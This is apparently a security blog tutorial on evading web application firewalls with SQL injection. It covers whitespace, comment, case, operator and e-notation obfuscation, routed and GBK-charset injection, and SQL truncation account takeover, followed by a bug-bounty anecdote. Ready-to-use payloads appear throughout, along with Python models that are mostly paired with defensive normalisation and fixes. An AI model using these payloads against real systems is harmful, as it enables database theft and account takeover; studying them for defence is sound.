AlbusSec:- Penetration-List 06 SQL Injection (SQLi) — Sample — 3

Albus Security
May 12, 2022

Hi Information Security folks, I hope you liked the previous article, in which we completed our SQL exploitation section. In today's article we look at what happens when we run into a WAF, that is, we learn the bypass techniques. First, a short introduction: I'm Aniket Tyagi, an Information Technology officer at the 5f eco foundation of India, an Information Security Researcher, and the founder of Albus Security. Without further ado, let's get started.

  • Using Space Alternatives
  • Using Comments
  • Using Parentheses
  • Case Sensitive
  • Use Different Operators
  • e-Notation Bypass
  • Routed SQL Injection
  • Advanced Authentication Bypass
  • Real-World Example

Using Space Alternatives:- Replace the plain space (%20) in the malicious query with another character that the MySQL lexer also accepts as whitespace: a tab (%09) or a newline (%0A); vertical tab (%0B), form feed (%0C) and carriage return (%0D) work as well. A signature that expects a literal space between keywords never sees one.

1'%09AND%091=1%09--+ or 1'%0AAND%0A1=1%0A--+

Using Comments:- Use an empty inline comment (/**/) in place of each whitespace in the malicious query. MySQL treats the comment as a token separator, so the query parses exactly as before.

1'/*test*/AND/**/1=1/**/ --+

Using Parentheses:- Parentheses around the operands remove the need for any whitespace at all, which defeats rules keyed on spaces:

(1)AND(1)=(1) --+

Case Sensitive:- Mix uppercase and lowercase letters inside keywords and function names. MySQL keywords and built-in functions are case-insensitive, so the query still runs, but a case-sensitive signature written for UNION SELECT or sleep( no longer matches.

1' uNIoN SeLEcT AlL 1,2,3,dAtAbAsE() --+

1' AnD 1=1 --+

1 aNd SlEeP(10) --+

Use Different Operators:- MySQL also accepts the symbolic forms of the logical operators, and a signature that looks for the keywords AND and OR does not see them. Because & and | are special characters in a query string, send them URL-encoded:

OR --> || --> %7C%7C

AND --> && --> %26%26

Note that || is logical OR in MySQL only while the PIPES_AS_CONCAT sql_mode is off (the default); with it on, || is string concatenation and the payload changes meaning.
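All five tricks above target the same weakness: a signature that expects the payload in one exact spelling. The following Python script is an added example, not code from the original article or from Albus Security. It applies each transformation to the sample payloads, runs the results against a deliberately naive signature set constructed for this example (it is not any real WAF's rule set), and then shows why a rule that normalises the input before matching catches every variant. The assumption that the WAF URL-decodes the parameter once before matching is part of the model.

```python
import re
from urllib.parse import quote, unquote

# Deliberately naive signatures, constructed for this example (not a vendor's
# rules): they expect plain spaces and upper-case keywords, which is exactly
# what the tricks above exploit.
NAIVE_SIGNATURES = [
    re.compile(r"' (AND|OR) \d+=\d+"),   # boolean test
    re.compile(r" UNION SELECT "),        # union-based extraction
    re.compile(r" AND sleep\("),          # time-based test
]


def naive_waf_blocks(raw_param: str) -> bool:
    """URL-decode the parameter once (as a WAF does) and run the naive rules."""
    decoded = unquote(raw_param)
    return any(sig.search(decoded) for sig in NAIVE_SIGNATURES)


# --- the obfuscations from the text -----------------------------------------

def space_alternative(payload: str, alt: str = "%09") -> str:
    """Swap every space for an encoded tab (%09), newline (%0A), %0B, %0C or
    %0D; MySQL's lexer accepts all of them as token separators."""
    return payload.replace(" ", alt)


def comment_spaces(payload: str) -> str:
    """Swap spaces for empty inline comments, which MySQL also treats as
    separators."""
    return payload.replace(" ", "/**/")


def parenthesise(lhs: str, rhs: str) -> str:
    """Wrap the operands so that no whitespace is needed at all."""
    return f"({lhs})AND({rhs})=({rhs})"


def alternate_case(payload: str) -> str:
    """Alternate the case of every letter. MySQL keywords and built-in function
    names are case-insensitive, so only a case-sensitive signature notices."""
    out, n = [], 0
    for ch in payload:
        if ch.isalpha():
            out.append(ch.upper() if n % 2 == 0 else ch.lower())
            n += 1
        else:
            out.append(ch)
    return "".join(out)


def symbolic_operators(payload: str) -> str:
    """Replace AND/OR with && and ||, URL-encoded because a bare & or | would
    be consumed by the query-string parser: %26%26 is AND, %7C%7C is OR.
    (|| is logical OR in MySQL unless sql_mode contains PIPES_AS_CONCAT.)"""
    payload = re.sub(r"\bAND\b", quote("&&", safe=""), payload, flags=re.I)
    return re.sub(r"\bOR\b", quote("||", safe=""), payload, flags=re.I)


# --- the defender's side: normalise, then match ------------------------------

def normalise(raw_param: str) -> str:
    """Decode, drop inline comments, collapse whitespace, fold case and map the
    symbolic operators back to keywords before any signature runs."""
    s = unquote(raw_param)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"\s+", " ", s).lower()
    return s.replace("&&", " and ").replace("||", " or ")


HARDENED_SIGNATURES = [
    re.compile(r"\b(and|or)\b\s*\(?\s*\d+\s*\)?\s*=\s*\(?\s*\d+"),
    re.compile(r"\bunion\b\s+select\b"),
    re.compile(r"\band\b\s*\(?\s*sleep\s*\("),
]


def hardened_waf_blocks(raw_param: str) -> bool:
    """Same idea as the naive rules, but run on the normalised text."""
    text = normalise(raw_param)
    return any(sig.search(text) for sig in HARDENED_SIGNATURES)


def evaluate(payload: str) -> dict:
    """Every variant of one payload with the verdict of both rule sets."""
    variants = {
        "plain": payload,
        "tab": space_alternative(payload),
        "newline": space_alternative(payload, "%0A"),
        "comment": comment_spaces(payload),
        "case": alternate_case(payload),
        "operator": symbolic_operators(payload),
    }
    return {name: (naive_waf_blocks(v), hardened_waf_blocks(v))
            for name, v in variants.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in evaluate("1' AND 1=1 --+").items():
        print(f"{name:9s} naive={'block' if naive else 'pass '} "
              f"normalised={'block' if hardened else 'pass '}")
```

Running it shows the plain payload blocked by both rule sets and every obfuscated variant passing the naive rules while still being caught after normalisation. The design point is that each bypass only works against a rule that matches on the attacker's spelling rather than on what the SQL parser will see, so decoding, comment stripping, whitespace folding and case folding belong before the signature, not after.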

e-Notation Bypass:- e-notation, also known as scientific notation, exists in most programming languages and in MySQL's number syntax. The e stands for exponent: 1e1 is 1 × 10^1 = 10. The same syntax can be used to write a number in a form that a WAF signature does not expect.

Simple-Method:- the number written as a plain literal.

E-Notation-Method:- 1.e(1)

In 2018, GoSecure's ethical hackers reviewed some conference presentations that mentioned this trick and started testing it locally against MySQL and MariaDB; they found that the e-notation quirk those presentations described was really impactful. During an engagement, GoSecure then found that the "SQL Database" rule in AWS WAF could be bypassed with it. For example, when an attacker sends a plain query, the WAF blocks it:

https://albussecurity.com/index.php?id=1' and sleep(10) --+

The WAF blocks this query, but when the attacker sends the same query prefixed with the e-notation expression, it passes:

https://albussecurity.com/index.php?id=1 AND 1.e(1) AND sleep(10) --+

At the time the WAF did not detect this form, and the attacker gets through to the database.

Routed SQL Injection:-

Routed SQL Injection is a situation where the query you can inject into is not the one that produces the visible result; instead, the output of the injectable query is fed into a second query, and that second query produces the output. In practice this means that when you inject a payload into the first query you get nothing back, or the server blocks the request. So you hex-encode the payload that is meant for the second query (a 0x... literal contains no quotes and no keywords) and attach it to a payload for the first query: the first query returns the decoded string as a row, the application passes that value into the second query, and it is the second query that executes your injection.

Query for the second stage (to be hex-encoded):- ' AND sleep(10) --+

0x2720414e4420736c65657028313029202d2d2b

Query for the first stage, which can stay in plain text:- ' UNION SELECT ALL

Now combine these two into one request:

https://albussecurity.com/index.php?id=1' UNION SELECT ALL 0x2720414e4420736c65657028313029202d2d2b --+

The server will not give you the result of the first query, but it will give the result of the second query, which is built from the decoded hex value. Routed SQL injection may sound a little hard for beginners, because it is a concept that confuses many people. If you solve a few labs related to routed SQL injection, you will understand it easily.
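To make the two-stage flow concrete, here is an added example (not code from the original article) that models an application issuing the two queries in sequence. It uses an in-memory SQLite database with constructed users and files tables, and SQLite's X'...' hex-string literal stands in for MySQL's 0x... literal; the table and column names are assumptions. The second-stage payload is a simple boolean bypass rather than sleep(), because SQLite has no sleep function, but the routing mechanism is the same one the text describes.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the two tables a hypothetical application
    queries in sequence (nothing here comes from the original article)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT);
        INSERT INTO users VALUES (1, 'alice'), (2, 'bob');
        CREATE TABLE files(owner TEXT, filename TEXT);
        INSERT INTO files VALUES ('alice', 'alice-notes.txt'),
                                 ('bob', 'bob-secret.pdf');
    """)
    return db


def hex_literal(payload: str, dialect: str = "mysql") -> str:
    """Hex-encode the second-stage payload so it rides through the first query
    as a literal that contains no quote and no keyword. MySQL reads 0x... as a
    binary string; SQLite spells the same thing X'...'."""
    h = payload.encode().hex()
    return f"0x{h}" if dialect == "mysql" else f"X'{h}'"


def lookup_username(db: sqlite3.Connection, user_id: str):
    """Stage 1: injectable, but its result is never shown to the user."""
    sql = f"SELECT username FROM users WHERE id = '{user_id}'"
    row = db.execute(sql).fetchone()
    if row is None:
        return None
    value = row[0]
    # A hex literal comes back as bytes; the application treats it as text.
    return value.decode() if isinstance(value, bytes) else value


def list_files(db: sqlite3.Connection, username: str) -> list:
    """Stage 2: the stage-1 value is concatenated into a second query, and this
    query is the one whose output the user sees."""
    sql = f"SELECT filename FROM files WHERE owner = '{username}'"
    return [r[0] for r in db.execute(sql).fetchall()]


def fetch_files_for(db: sqlite3.Connection, user_id: str) -> list:
    """The application flow: user id -> username -> that user's files."""
    username = lookup_username(db, user_id)
    return [] if username is None else list_files(db, username)


def routed_payload(second_stage: str, dialect: str = "sqlite") -> str:
    """Build the first-stage parameter: a UNION that returns the hex-decoded
    second-stage payload as the 'username' row. The id 0 matches no real row,
    so the UNION row is the only result."""
    return f"0' UNION SELECT {hex_literal(second_stage, dialect)} -- "


if __name__ == "__main__":
    db = make_db()
    print(fetch_files_for(db, "1"))                            # normal use
    print(fetch_files_for(db, "' OR '1'='1"))                  # hits stage 1 only
    print(fetch_files_for(db, routed_payload("' OR '1'='1")))  # executes in stage 2
    print(hex_literal("' AND sleep(10) --+"))                  # the literal from the text
```

Injecting the boolean bypass directly into the id parameter only changes which username stage 1 returns, so the visible result is still one user's files. Routing the same payload through a hex literal makes stage 1 return the payload string itself, and stage 2 then runs WHERE owner = '' OR '1'='1' and returns every file. The hex_literal helper also reproduces the 0x2720414e... value from the text, which is a useful check when hand-building these payloads.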

Advanced Authentication bypass:-

I already explained in my previous article how to bypass authentication with the help of SQLi. But that basic technique does not work in every case, so here we learn some advanced tricks to bypass authentication with SQLi.

GBK Authentication bypass

When the application escapes the quote with a backslash (addslashes-style) but the database connection uses the GBK character set, you can send %A8%27 (or another valid GBK lead byte followed by the quote, such as %BF%27) instead of a bare '. The escaping inserts %5C before %27, and in GBK the lead byte %A8 combines with %5C into a single two-byte character, so the quote survives unescaped and terminates the string:

https://albussecurity.com/student.php?id=1%A8%27AND 1=1 --+
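The following Python is an added example (not from the article) that models the mechanism: the application escapes the raw bytes without knowing the charset, and the database server then interprets those bytes in the connection charset before parsing the statement. The table name student, the 0xBF lead byte and the UTF-8 comparison case are assumptions for illustration; the article's %A8 works on the same principle.

```python
def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping in the style of PHP's addslashes(): a backslash is
    inserted before ' " \\ and NUL, with no knowledge of the charset."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def build_query(param: bytes, connection_charset: str) -> str:
    """Escape the raw bytes, then interpret them in the connection charset the
    way the server does before lexing the statement (table name assumed)."""
    escaped = addslashes(param)
    text = escaped.decode(connection_charset, errors="replace")
    return f"SELECT * FROM student WHERE id = '{text}'"


def unescaped_quotes(sql: str) -> int:
    """Count single quotes not preceded by a backslash: the string delimiters
    the parser will actually honour. A clean query has exactly two."""
    return sum(1 for i, ch in enumerate(sql)
               if ch == "'" and (i == 0 or sql[i - 1] != "\\"))


# Constructed attacker input: a GBK lead byte (0xBF here; the article uses
# 0xA8), then the quote, then the boolean test from the text.
PAYLOAD = b"1\xbf' AND 1=1 -- "


def demo(connection_charset: str) -> tuple:
    """Return the query the server sees and how many live quotes it contains."""
    sql = build_query(PAYLOAD, connection_charset)
    return sql, unescaped_quotes(sql)


if __name__ == "__main__":
    for cs in ("gbk", "utf-8"):
        sql, n = demo(cs)
        print(f"{cs:6s} quotes={n}  {sql!r}")
```

With the connection in GBK, the bytes BF 5C form the single character 縗, the backslash is gone, and the query contains three live quotes: the injected one closes the literal and AND 1=1 is evaluated. With a UTF-8 connection the lone 0xBF is just an invalid byte, the backslash still escapes the quote, and the query keeps its two delimiters. The fix is to keep escaping and the connection charset in agreement (a charset-aware escaper, or better, prepared statements with bound parameters) rather than to filter for %A8 or %BF.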

SQL Truncation Bypass

SQL truncation is a nasty database behaviour whose exploitation lets an attacker take over another user's account. First, how it occurs. Suppose a web application does not check the length of user input, and its MySQL database runs in non-strict mode (the old default; since MySQL 5.7 STRICT_TRANS_TABLES is on by default and rejects over-long values instead). The username column is defined with a fixed length, say VARCHAR(20). In non-strict mode MySQL silently truncates a longer string to the column length on insert rather than raising an error. In addition, with the usual PAD SPACE collations trailing spaces are ignored when strings are compared, so 'carlos' and 'carlos' followed by spaces are treated as equal. Now suppose a user Carlos already exists and an attacker registers the username "carlos" padded with spaces out to the 20-character limit and then "hack", 24 characters in total. The application's duplicate-name check compares the full string, finds no such user, and accepts the registration. The INSERT then truncates the value to 20 characters, which is "carlos" padded with spaces, so the table now holds a second row that compares equal to "carlos", stored with the password the attacker chose. When the attacker logs in as carlos with that password, the lookup matches his row and he is logged in as Carlos. That is a successful truncation attack. Note that it only works if there is no UNIQUE index on the username column (the truncated INSERT would otherwise fail as a duplicate) and strict mode is off. I hope you understand the SQL truncation bypass. I recommend you solve some CTF challenges related to the SQL truncation attack.
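The following Python is an added example, not code from the article, that models the registration and login flow just described. It reproduces MySQL's non-strict truncation and PAD SPACE comparison in a few lines so the attack can be stepped through without a database; the 20-character column, the absence of a UNIQUE index and the passwords are assumptions for illustration, and the strict flag shows what STRICT_TRANS_TABLES changes.

```python
COLUMN_LENGTH = 20   # assumed: username VARCHAR(20)


def store_varchar(value: str, length: int = COLUMN_LENGTH,
                  strict: bool = False) -> str:
    """Model of the INSERT. Non-strict sql_mode silently cuts an over-long
    string to the column length; STRICT_TRANS_TABLES (the default since
    MySQL 5.7) rejects it with 'Data too long' instead."""
    if len(value) > length:
        if strict:
            raise ValueError("Data too long for column 'username'")
        return value[:length]
    return value


def pad_space_equal(a: str, b: str) -> bool:
    """PAD SPACE collations ignore trailing spaces when comparing, so 'carlos'
    and 'carlos' + 14 spaces are equal (MySQL 8's utf8mb4_0900_ai_ci is NO PAD
    and would not behave this way)."""
    return a.rstrip(" ") == b.rstrip(" ")


class Users:
    """Toy users table with no UNIQUE index on username (assumption)."""

    def __init__(self, strict: bool = False):
        self.rows = []          # (username, password)
        self.strict = strict

    def find(self, username: str) -> list:
        return [r for r in self.rows if pad_space_equal(r[0], username)]

    def insert(self, username: str, password: str) -> None:
        self.rows.append((store_varchar(username, strict=self.strict), password))


def register(users: Users, username: str, password: str) -> bool:
    """Application logic: refuse a name that already exists, then INSERT.
    The duplicate check sees the full, untruncated string."""
    if users.find(username):
        return False
    users.insert(username, password)
    return True


def login(users: Users, username: str, password: str) -> bool:
    return any(pw == password for _, pw in users.find(username))


def truncation_payload(victim: str, length: int = COLUMN_LENGTH,
                       tail: str = "hack") -> str:
    """victim + spaces up to the column length + tail: differs from the victim
    name for the duplicate check, collapses to it once truncated."""
    return victim.ljust(length) + tail


def run_attack(strict: bool = False) -> bool:
    """True when the attacker ends up able to log in as carlos with the
    password he chose at registration."""
    users = Users(strict=strict)
    register(users, "carlos", "victim-password")
    try:
        register(users, truncation_payload("carlos"), "attacker-password")
    except ValueError:
        return False          # strict mode: the over-long INSERT is rejected
    return login(users, "carlos", "attacker-password")


if __name__ == "__main__":
    print("non-strict:", run_attack())          # True
    print("strict    :", run_attack(strict=True))  # False
```

Two independent defences each stop this on their own: strict mode turns the truncation into an error, and a UNIQUE index on the column makes the truncated row a duplicate key under a PAD SPACE collation. Enforcing the length in the application before the query is cheap as well, but it is the database settings that close the gap for every code path.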

Real-World-Example:-

Vulnerability: Database Access through Blind-SQL-Injection

Reward: $1300

Here I'll tell you about my finding on a private program where I found "Database access through Blind-SQL-Injection". Let's call that program private.com. I spent almost 4 weeks on that program and reported lots of vulnerabilities there, but they were all P4 and P3, so I just scrolled through the JS files hoping to find a unique URL. After some time I saw one endpoint.

https://private.com/files?serialnumber=342

So, with a hacker's mindset, I just tried SQL-Injection payloads, Command Injection, XXE, and so on, but none of it worked because of the WAF. To execute anything I had to inject an advanced payload, so I made the best payload for this.

https://private.com/files?serialnumber=1',"),/*test*/%26%26%09sLeEp(30) --+

Whenever I sent this request to the server, the server waited for 30 seconds. Yes, it really happened. So I simply used an advanced sqlmap command to extract information from the database. Boom, I got access to the database, meaning I was able to extract data from it.

Then I reported this vulnerability to the company, and within 2 hours they replied that they would set up a meeting with their security team to discuss the issue and get back to me as soon as possible. Within 2 weeks I got a bounty from the company, and they fixed the vulnerability.

Finally, we've completed our SQL-Injection section. But here is an update for everyone: from now on I'll upload topics to Medium as samples rather than as full sections, because I've started writing a book, which is why I won't upload everything on Medium. Upcoming write-ups will be uploaded as samples. Thank you for reading.

You can download a sample of the book
